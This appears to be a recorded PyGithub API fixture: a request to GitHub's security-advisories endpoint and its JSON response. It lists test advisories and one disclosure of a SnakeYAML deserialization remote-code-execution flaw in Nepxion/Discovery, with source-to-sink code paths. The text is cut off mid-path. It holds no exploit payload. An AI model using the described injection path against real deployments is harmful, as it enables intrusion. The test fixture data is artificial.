1
2
3
4
5
6
7
8
9
10
|
https
GET
api.github.com
None
/repos/JLLeitschuh/security-research/security-advisories
{'Authorization': 'Basic login_and_password_removed', 'User-Agent': 'PyGithub/Python'}
None
200
[('Server', 'GitHub.com'), ('Date', 'Thu, 30 Mar 2023 21:59:35 GMT'), ('Content-Type', 'application/json; charset=utf-8'), ('Transfer-Encoding', 'chunked'), ('Cache-Control', 'private, max-age=60, s-maxage=60'), ('Vary', 'Accept, Authorization, Cookie, X-GitHub-OTP, Accept-Encoding, Accept, X-Requested-With'), ('ETag', 'W/"2f56de9a6e668493a583a01b2bf0ededa567b9fe42e26c812aa724bd9c4e048a"'), ('Last-Modified', 'Thu, 30 Mar 2023 19:31:33 GMT'), ('X-OAuth-Scopes', 'delete_repo, gist, repo, workflow'), ('X-Accepted-OAuth-Scopes', ''), ('github-authentication-token-expiration', '2023-06-28 17:58:10 UTC'), ('X-GitHub-Media-Type', 'github.v3; format=json'), ('x-github-api-version-selected', '2022-11-28'), ('X-RateLimit-Limit', '5000'), ('X-RateLimit-Remaining', '4992'), ('X-RateLimit-Reset', '1680217136'), ('X-RateLimit-Used', '8'), ('X-RateLimit-Resource', 'core'), ('Access-Control-Expose-Headers', 'ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset'), ('Access-Control-Allow-Origin', '*'), ('Strict-Transport-Security', 'max-age=31536000; includeSubdomains; preload'), ('X-Frame-Options', 'deny'), ('X-Content-Type-Options', 'nosniff'), ('X-XSS-Protection', '0'), ('Referrer-Policy', 'origin-when-cross-origin, strict-origin-when-cross-origin'), ('Content-Security-Policy', "default-src 'none'"), ('Content-Encoding', 'gzip'), ('X-GitHub-Request-Id', 'F3CD:09C6:2B9B77:59F703:64260647')]
[ { "ghsa_id": "GHSA-wmmh-r9w4-hpxx", "cve_id": "CVE-2050-00000", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-wmmh-r9w4-hpxx", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-wmmh-r9w4-hpxx", "summary": "A test creating a GHSA via the API", "description": "This is a detailed description of this advisories impact and patches.", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": null, "identifiers": [ { "value": "GHSA-wmmh-r9w4-hpxx", "type": "GHSA" }, { "value": "CVE-2050-00000", "type": "CVE" } ], "state": "draft", "created_at": "2023-03-28T21:41:40Z", "updated_at": "2023-03-28T21:41:40Z", "published_at": null, "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "npm", "name": "a-package" }, "vulnerable_version_range": ">= 1.0.2", "patched_versions": "1.0.5", "vulnerable_functions": [ "function-name" ] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H", "score": 7.6 }, "cwes": [ { "cwe_id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, { "cwe_id": "CWE-501", "name": "Trust Boundary Violation" } ], "cwe_ids": [ "CWE-400", "CWE-501" ], "credits": [ { "login": "octocat", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "octocat", "id": 583231, "node_id": "MDQ6VXNlcjU4MzIzMQ==", "avatar_url": "https://avatars.githubusercontent.com/u/583231?v=4", "gravatar_id": "", "url": "https://api.github.com/users/octocat", "html_url": "https://github.com/octocat", "followers_url": "https://api.github.com/users/octocat/followers", "following_url": "https://api.github.com/users/octocat/following{/other_user}", "gists_url": "https://api.github.com/users/octocat/gists{/gist_id}", "starred_url": "https://api.github.com/users/octocat/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/octocat/subscriptions", "organizations_url": "https://api.github.com/users/octocat/orgs", "repos_url": "https://api.github.com/users/octocat/repos", "events_url": "https://api.github.com/users/octocat/events{/privacy}", "received_events_url": "https://api.github.com/users/octocat/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "pending" } ] }, { "ghsa_id": "GHSA-wvgm-59wj-rh8h", "cve_id": null, "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-wvgm-59wj-rh8h", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-wvgm-59wj-rh8h", "summary": "Testing GHSA creation", "description": "Example closed GHSA for testing\r\n", "severity": null, "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": null, "identifiers": [ { "value": "GHSA-wvgm-59wj-rh8h", "type": "GHSA" } ], "state": "closed", "created_at": "2023-01-26T19:33:30Z", "updated_at": "2023-02-02T17:58:59Z", "published_at": null, "closed_at": "2023-02-02T17:58:59Z", "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "", "name": "" }, "vulnerable_version_range": "", "patched_versions": "", "vulnerable_functions": [] } ], "cvss": { "vector_string": null, "score": null }, "cwes": [], "cwe_ids": [], "credits": [], "credits_detailed": [] }, { "ghsa_id": "GHSA-22cq-8f5q-p5g2", "cve_id": "CVE-2022-1471", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-22cq-8f5q-p5g2", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-22cq-8f5q-p5g2", "summary": "Nepxion/Discovery: Remote Code Execution via SnakeYAML Deserialization Gadgets", "description": "### Impact\r\n\r\nRemote Code Execution vulnerability in the \r\n\r\n### Vulnerability\r\n\r\nThis project leverages SnakeYAML to deserialize YAML input into java objects. Unfortunately, this library allows for arbitrary execution of code when deserializing untrusted user input.\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n\r\n return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L160-L160).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 8 steps</summary>\r\n\r\n1. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L160-L160)\r\n <pre><code class=\"java\"> @ApiOperation(value = \"根据Yaml格式,反解析版本蓝绿灰度发布策略为Json格式\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n @ResponseBody\r\n public ResponseEntity<?> convertVersionRelease(<strong>@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml</strong>) {\r\n return doDeparseVersionReleaseYaml(conditionStrategyYaml);\r\n }\r\n </code></pre>\r\n \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L161-L161)\r\n <pre><code class=\"java\"> @ResponseBody\r\n public ResponseEntity<?> convertVersionRelease(@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml) {\r\n return doDeparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n }\r\n \r\n </code></pre>\r\n \r\n3. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L341-L341)\r\n <pre><code class=\"java\"> }\r\n \r\n private ResponseEntity<?> doDeparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n try {\r\n ConditionStrategy result = strategyResource.deparseVersionReleaseYaml(conditionStrategyYaml);\r\n </code></pre>\r\n \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L343-L343)\r\n <pre><code class=\"java\"> private ResponseEntity<?> doDeparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n try {\r\n ConditionStrategy result = strategyResource.deparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n \r\n return ResponseUtil.getSuccessResponse(result);\r\n </code></pre>\r\n \r\n5. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L197-L197)\r\n <pre><code class=\"java\">\r\n @Override\r\n public ConditionStrategy deparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n return YamlUtil.fromYaml(conditionStrategyYaml, ConditionStrategy.class);\r\n }\r\n </code></pre>\r\n \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L198-L198)\r\n <pre><code class=\"java\"> @Override\r\n public ConditionStrategy deparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n return YamlUtil.fromYaml(<strong>conditionStrategyYaml</strong>, ConditionStrategy.class);\r\n }\r\n \r\n </code></pre>\r\n \r\n7. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n <pre><code class=\"java\"> }\r\n \r\n public static <T> T fromYaml(<strong>String yaml</strong>, Class<T> clazz) {\r\n // 非线程安全\r\n Yaml snakeYaml = new Yaml();\r\n </code></pre>\r\n \r\n8. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n <pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n \r\n return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n }\r\n }</code></pre>\r\n \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n\r\n return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L139-L139).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 10 steps</summary>\r\n\r\n1. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L139-L139)\r\n <pre><code class=\"java\"> @ApiOperation(value = \"根据Yaml格式,解析版本蓝绿灰度发布策略为Xml格式\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n @ResponseBody\r\n public ResponseEntity<?> parseVersionRelease(<strong>@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml</strong>) {\r\n return doParseVersionRelease(conditionStrategyYaml);\r\n }\r\n </code></pre>\r\n \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L140-L140)\r\n <pre><code class=\"java\"> @ResponseBody\r\n public ResponseEntity<?> parseVersionRelease(@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml) {\r\n return doParseVersionRelease(<strong>conditionStrategyYaml</strong>);\r\n }\r\n \r\n </code></pre>\r\n \r\n3. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L311-L311)\r\n <pre><code class=\"java\"> }\r\n \r\n private ResponseEntity<?> doParseVersionRelease(<strong>String conditionStrategyYaml</strong>) {\r\n try {\r\n String result = strategyResource.parseVersionRelease(conditionStrategyYaml);\r\n </code></pre>\r\n \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L313-L313)\r\n <pre><code class=\"java\"> private ResponseEntity<?> doParseVersionRelease(String conditionStrategyYaml) {\r\n try {\r\n String result = strategyResource.parseVersionRelease(<strong>conditionStrategyYaml</strong>);\r\n \r\n return ResponseUtil.getSuccessResponse(result);\r\n </code></pre>\r\n \r\n5. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L174-L174)\r\n <pre><code class=\"java\">\r\n @Override\r\n public String parseVersionRelease(<strong>String conditionStrategyYaml</strong>) {\r\n ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(conditionStrategyYaml);\r\n \r\n </code></pre>\r\n \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L175-L175)\r\n <pre><code class=\"java\"> @Override\r\n public String parseVersionRelease(String conditionStrategyYaml) {\r\n ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n \r\n return parseVersionRelease(conditionStrategy);\r\n </code></pre>\r\n \r\n7. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L197-L197)\r\n <pre><code class=\"java\">\r\n @Override\r\n public ConditionStrategy deparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n return YamlUtil.fromYaml(conditionStrategyYaml, ConditionStrategy.class);\r\n }\r\n </code></pre>\r\n \r\n8. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L198-L198)\r\n <pre><code class=\"java\"> @Override\r\n public ConditionStrategy deparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n return YamlUtil.fromYaml(<strong>conditionStrategyYaml</strong>, ConditionStrategy.class);\r\n }\r\n \r\n </code></pre>\r\n \r\n9. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n <pre><code class=\"java\"> }\r\n \r\n public static <T> T fromYaml(<strong>String yaml</strong>, Class<T> clazz) {\r\n // 非线程安全\r\n Yaml snakeYaml = new Yaml();\r\n </code></pre>\r\n \r\n10. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n <pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n \r\n return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n }\r\n }</code></pre>\r\n \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n\r\n return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L111-L111).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 8 steps</summary>\r\n\r\n1. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L111-L111)\r\n <pre><code class=\"java\"> @ApiOperation(value = \"局部订阅方式,根据Yaml格式,重新创建版本蓝绿灰度发布(创建链路智能编排,不创建条件表达式)\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n @ResponseBody\r\n public ResponseEntity<?> recreateVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @PathVariable(value = \"serviceId\") @ApiParam(value = \"服务名\", required = true) String serviceId, <strong>@RequestBody @ApiParam(value = \"蓝绿灰度路由策略Yaml\", required = true) String conditionRouteStrategyYaml</strong>) {\r\n return doRecreateVersionRelease(group, serviceId, conditionRouteStrategyYaml);\r\n }\r\n </code></pre>\r\n \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L112-L112)\r\n <pre><code class=\"java\"> @ResponseBody\r\n public ResponseEntity<?> recreateVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @PathVariable(value = \"serviceId\") @ApiParam(value = \"服务名\", required = true) String serviceId, @RequestBody @ApiParam(value = \"蓝绿灰度路由策略Yaml\", required = true) String conditionRouteStrategyYaml) {\r\n return doRecreateVersionRelease(group, serviceId, <strong>conditionRouteStrategyYaml</strong>);\r\n }\r\n \r\n </code></pre>\r\n \r\n3. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L271-L271)\r\n <pre><code class=\"java\"> }\r\n \r\n private ResponseEntity<?> doRecreateVersionRelease(String group, String serviceId, <strong>String conditionRouteStrategyYaml</strong>) {\r\n try {\r\n String result = strategyResource.recreateVersionRelease(group, serviceId, conditionRouteStrategyYaml);\r\n </code></pre>\r\n \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L273-L273)\r\n <pre><code class=\"java\"> private ResponseEntity<?> doRecreateVersionRelease(String group, String serviceId, String conditionRouteStrategyYaml) {\r\n try {\r\n String result = strategyResource.recreateVersionRelease(group, serviceId, <strong>conditionRouteStrategyYaml</strong>);\r\n \r\n return ResponseUtil.getSuccessResponse(result);\r\n </code></pre>\r\n \r\n5. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L126-L126)\r\n <pre><code class=\"java\">\r\n @Override\r\n public String recreateVersionRelease(String group, String serviceId, <strong>String conditionRouteStrategyYaml</strong>) {\r\n ConditionRouteStrategy conditionRouteStrategy = YamlUtil.fromYaml(conditionRouteStrategyYaml, ConditionRouteStrategy.class);\r\n \r\n </code></pre>\r\n \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L127-L127)\r\n <pre><code class=\"java\"> @Override\r\n public String recreateVersionRelease(String group, String serviceId, String conditionRouteStrategyYaml) {\r\n ConditionRouteStrategy conditionRouteStrategy = YamlUtil.fromYaml(<strong>conditionRouteStrategyYaml</strong>, ConditionRouteStrategy.class);\r\n \r\n return recreateVersionRelease(group, serviceId, conditionRouteStrategy);\r\n </code></pre>\r\n \r\n7. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n <pre><code class=\"java\"> }\r\n \r\n public static <T> T fromYaml(<strong>String yaml</strong>, Class<T> clazz) {\r\n // 非线程安全\r\n Yaml snakeYaml = new Yaml();\r\n </code></pre>\r\n \r\n8. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n <pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n \r\n return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n }\r\n }</code></pre>\r\n \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n\r\n return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L97-L97).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 10 steps</summary>\r\n\r\n1. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L97-L97)\r\n <pre><code class=\"java\"> @ApiOperation(value = \"局部订阅方式,根据Yaml格式,创建版本蓝绿灰度发布\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n @ResponseBody\r\n public ResponseEntity<?> createVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @PathVariable(value = \"serviceId\") @ApiParam(value = \"服务名\", required = true) String serviceId, <strong>@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml</strong>) {\r\n return doCreateVersionRelease(group, serviceId, conditionStrategyYaml);\r\n }\r\n </code></pre>\r\n \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L98-L98)\r\n <pre><code class=\"java\"> @ResponseBody\r\n public ResponseEntity<?> createVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @PathVariable(value = \"serviceId\") @ApiParam(value = \"服务名\", required = true) String serviceId, @RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml) {\r\n return doCreateVersionRelease(group, serviceId, <strong>conditionStrategyYaml</strong>);\r\n }\r\n \r\n </code></pre>\r\n \r\n3. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L251-L251)\r\n <pre><code class=\"java\"> }\r\n \r\n private ResponseEntity<?> doCreateVersionRelease(String group, String serviceId, <strong>String conditionStrategyYaml</strong>) {\r\n try {\r\n String result = strategyResource.createVersionRelease(group, serviceId, conditionStrategyYaml);\r\n </code></pre>\r\n \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L253-L253)\r\n <pre><code class=\"java\"> private ResponseEntity<?> doCreateVersionRelease(String group, String serviceId, String conditionStrategyYaml) {\r\n try {\r\n String result = strategyResource.createVersionRelease(group, serviceId, <strong>conditionStrategyYaml</strong>);\r\n \r\n return ResponseUtil.getSuccessResponse(result);\r\n </code></pre>\r\n \r\n5. 